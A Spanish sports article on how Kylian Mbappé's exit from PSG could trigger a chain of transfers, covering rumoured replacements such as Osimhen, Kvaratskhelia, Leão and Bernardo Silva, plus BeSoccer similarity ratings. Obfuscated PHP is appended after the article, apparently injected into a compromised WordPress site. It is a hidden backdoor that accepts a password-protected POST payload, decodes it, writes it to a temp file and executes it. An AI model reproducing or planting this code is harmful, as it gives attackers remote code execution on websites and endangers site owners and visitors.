El efecto dominó de Mbappé

La salida del internacional francés obligará al PSG a buscarle un sustituto y generaría, además, una sucesión de movimientos en el mercado.

No se habían alcanzado aún las ocho de la tarde el pasado viernes cuando, desde París, saltaba una noticia que, no por ser esperada, dejaba de desatar un tsunami en el panorama futbolístico mundial. Mediante un post publicado en sus redes sociales, Kylian Mbappé comunicaba que no seguirá en el París Saint-Germain más allá del próximo 30 de junio.El atacante de Bondy confirmaba, de este modo, su salida del equipo de Luis Enrique sin dejar ni un solo euro en las arcas del Parque de los Príncipes, al mismo tiempo que terminó por alimentar todos los rumores que le vinculan al Real Madrid pese a que, en ningún momento de su comunicado, mencionó al club del Santiago Bernabéu.

Sin embargo, dejando de lado las hipótesis sobre dónde tendrá lugar su próximo reto, lo que sí es una certeza es que dejará un vacío de considerables dimensiones en el campeón francés. Y no un campeón cualquiera, sino uno que, a buen seguro, no escatimará en esfuerzos económicos para encontrar un recambio de garantías y para dotarle a Luis Enrique de una pieza más con la que diseñar un engranaje ganador, capaz de seguir intentando la conquista de Europa que tanto se le está resistiendo a Nasser Al Khelaïfi como presidente del club. Y es precisamente su músculo financiero el que tiene sobre aviso a varios grandes clubes europeos. Mbappé es la gran ficha del tablero que ha caído… y que propiciará un efecto dominó de incalculables consecuencias. Ahora, varias estrellas del viejo continente, podrían ser llamadas para relevar al crack parisino.

Son muchos los nombres que han salido (y saldrán) a la palestra para convertirse en el sucesor del aún ‘7′ del PSG. Esta misma semana, L’Equipe apuntaba que el equipo del Parque de los Príncipes está cocinando un ‘megaverano’ para hallar un sustituto a la altura. Además, subrayaba cuatro nombres: Victor Osimhen y Khvicha Kvaratskhelia en el Nápoles, Rafael Leão en el Milan y Bernardo Silva en el Manchester City. Cuatro jugadores de perfiles e incluso posiciones muy diferentes a Mbappé pero, a fin de cuentas, futbolistas de relumbrón y con los que el flamante ganador de la Ligue 1 pretendería dar un nuevo golpe sobre la mesa. Y cuatro hombres que, de recalar en el PSG, contribuirían a que siguiesen cayendo piezas del enrevesado dominó que es el fútbol europeo.

Osimhen, el primero de los ‘implicados’ en la retahíla de nombres que publicaba L’Equipe, se presenta como una opción francamente complicada para los parisinos por la dureza de Aurelio De Laurentiis y, por ende, del Nápoles, a la hora de negociar. No obstante, el equipo de capital francesa ya ha demostrado en multitud de ocasiones que acometer fichajes de más de tres dígitos no le supone ningún impedimento y, además, liberará una enorme masa salarial con la salida de Mbappé. Los napolitanos, conscientes de que Osimhen saldrá tarde o temprano, ya sondean potenciales sustitutos. Gianluca Di Marzio apunta a que el ‘9′ que busca De Laurentiis es Samu Omorodion, delantero del Atlético de Madrid cedido en el Alavés y por el que los colchoneros podrían estar atentos a ofertas en torno a los 40 millones de euros.

A Osimhen, un perfil claro de referencia en ataque, le seguiría en la lista de deseos de los parisinos Kvaratskhelia, un extremo habilidoso y encarador. El georgiano no tiene cláusula de rescisión pero, una vez más, le llevaría al PSG a enfrentarse a la intransigencia de De Laurentiis para hacer negocios. En este punto, La Gazzetta dello Sport asegura que los parisinos podrían ofrecer 80 millones de euros por ‘Kvara’ más una cesión, con salario pagado, de Randal Kolo Muani. El rendimiento del ex del Eintracht no ha sido el esperado en la escuadra de Luis Enrique (doce goles en los más de 2.200 minutos que ha jugado hasta ahora) y podría entrar en liza para abaratar esta operación. La salida de Kvaratskhelia, además, seguiría impulsando el efecto dominó llevando al Nápoles a buscarle un relevo. Según el Corriere dello Sport, el equipo del Diego Armando Maradona estaría siguiendo la pista de Mason Greenwood, cedido actualmente en el Getafe y un año más de contrato en el Manchester United. Los ‘Red Devils’, eso sí, todavía tienen que decidir qué hacer con el atacante inglés.

Sin salir de la Serie A, aparece en la recámara parisina otro hombre que conoce muy bien Luis Campos: Rafael Leão. El atacante portugués tendría la dificultad añadida de que fue recientemente renovado con el Milan con una subida salarial y, también, con una nueva cláusula de rescisión de 175 millones de euros. Sin embargo, su nombre siempre aparece en todas las quinielas de fichajes futuribles para las superpotencias del panorama europeo. En San Siro, sabedores de esta circunstancia, siguen buscando con esmero hipotéticos recambios. Tal y como apunta la prensa italiana, Benjamin Sesko, delantero del RB Leipzig y Joshua Zirkzee, ex del Bayern y líder del épico Bolonia de Thiago Motta, aparecen en la agenda ‘rossonera’.

Por último, la opción Bernardo Silva. El portugués, un perfil muy distinto a los tres anteriores mencionados y un pilar fundamental del Manchester City de Pep Guardiola, tiene una cláusula de rescisión de 58 millones de euros. Una cifra sorprendentemente baja que podría invitar al PSG a, por lo menos, intentarlo. La prensa catalana lo ha vinculado en más de una ocasión con el Barcelona, pero Silva, en privado, habría reconocido ver con buenos ojos su retorno a Francia (ya brilló en la Ligue 1 con el Mónaco). El City, para la difícil labor de suplir al jugador lisboeta, podría acrecentar el efecto dominó con dos objetivos: Lucas Paquetá, estrella del West Ham y relacionado con los ‘citizens’ en más de una ocasión, y Jamal Musiala. The Guardian fue quien publicó, hace algunas semanas, que el campeón de la Premier podría ir a por el internacional alemán, cuya renovación con el Bayern de Múnich sigue en punto muerto.

L’Equipe estrechaba el cerco con Osimhen, Kvaratskhelia, Leão y Bernardo Silva, pero el goteo de potenciales recambios de Mbappé es incesante. Salah, Rashford, Gavi, Kimmich, Jonathan David, Sesko… los nombres y los rumores proliferan a la misma velocidad que caerán las piezas de un efecto dominó cuyas consecuencias no se podrán analizar hasta el próximo 1 de septiembre. El mercado de fichajes de este verano apunta a ser, en vista de este torrente de rumores, altamente imprevisible.

Los mejores recambios según el Big Data

BeSoccer, una herramienta que trabaja con estadísticas, ofrece una lista de los tres futbolistas con características más similares a las de Kylian Mbappé. No obstante, y acorde a las informaciones y rumores actuales, estos no aparecen en una lista de hipotéticos recambios para Kylian Mbappé. Los tres jugadores han sido elegidos por la aplicación en base a sus métricas derivadas de su rendimiento e impacto en el terreno de juego. Según BeSoccer, los tres mejores sustitutos para el ‘7′ del PSG serían Gabriel Jesus, Vangelis Pavlidis y Loïs Openda.

Gabriel Jesus tendría un 71% de similitud con Mbappé. La versatilidad del brasileño le convierte en un jugador capaz de ubicarse en banda, de mediapunta por detrás de un delantero de referencia e incluso de ‘9′ al uso, convirtiéndose así en un perfil francamente parecido al parisino. Y aunque la prensa inglesa ya ha publicado que los ‘Gunners’ estarían buscándole un remplazo debido a su rendimiento, bastante gris en los últimos meses, no ha copado ningún rumor que le vincule al PSG.

Pavlidis se asemeja al ‘7′ del PSG también en un 71%. No obstante, el atacante griego ha estado acostumbrado a abarcar mucho más campo en sus actuaciones en el AZ Alkmaar de esta temporada. Sus registros goleadores, eso sí, infunden temor: 32 goles en 45 partidos. Por último, Loïs Openda, camaleónico delantero del RB Leipzig y que tiene un 71% de parecido a Mbappé según BeSoccer. No obstante, pese a sus similitudes, tampoco ha sonado como posible fichaje del PSG. La terna de candidatos es extensa, el verano muy largo y, la salida de Mbappé, un tsunami de incalculables consecuencias. Hagan sus apuestas: la primera ficha del dominó ha caído…

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}